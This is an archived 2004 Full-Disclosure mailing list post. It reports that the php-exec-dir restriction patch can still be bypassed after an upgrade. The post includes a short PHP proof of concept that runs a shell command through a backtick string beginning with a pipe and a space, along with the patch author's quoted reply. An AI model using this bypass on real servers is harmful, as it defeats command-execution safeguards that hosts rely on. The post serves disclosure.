[Full-Disclosure] php-exec-dir vulnerable after latest upgrade
From: VeNoMouS (venom_at_gen-x.co.nz)
Date: 07/08/04
- Previous message: Jelmer: "RE: [Full-Disclosure] Microsoft hides certain types of files from your eyes + some filename parsing bug"
- Next in thread: C. McCohy: "[Full-Disclosure] Re: php-exec-dir vulnerable after latest upgrade"
- Reply: C. McCohy: "[Full-Disclosure] Re: php-exec-dir vulnerable after latest upgrade"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: "C. McCohy" <mccohy@kyberdigi.cz>, <full-disclosure@lists.netsys.com> Date: Thu, 8 Jul 2004 13:05:24 +1200
<?php
$blah = `| /bin/ps aux`;
echo nl2br($blah);
?>
^^ do a |<space>ps exploits it again
i my exec_dir in php.ini set to /usr/local/lib/php/bin/ with nothing inside
it and i was still able to execute it, you HAVE to do the space after the
pipe '|'.
----- Original Message -----
From: "C. McCohy" <mccohy@kyberdigi.cz>
To: "VeNoMouS" <venom@gen-x.co.nz>
Sent: Wednesday, July 07, 2004 9:43 PM
Subject: Re: php-exec-dir vulnerable?
> Ok I fixed all patches to all previous and current versions of the patch,
> description can be found on the project homepage
> http://kyberdigi.cz/projects/execdir/
>
> Please inform all internet groups you have informed about the bug before.
>
> --
> Baj ... C. McCohy
>
> While you are reading this text, an essential hacking tool
> is being silently installed on your computer.
>
>
>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
- Previous message: Jelmer: "RE: [Full-Disclosure] Microsoft hides certain types of files from your eyes + some filename parsing bug"
- Next in thread: C. McCohy: "[Full-Disclosure] Re: php-exec-dir vulnerable after latest upgrade"
- Reply: C. McCohy: "[Full-Disclosure] Re: php-exec-dir vulnerable after latest upgrade"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
|
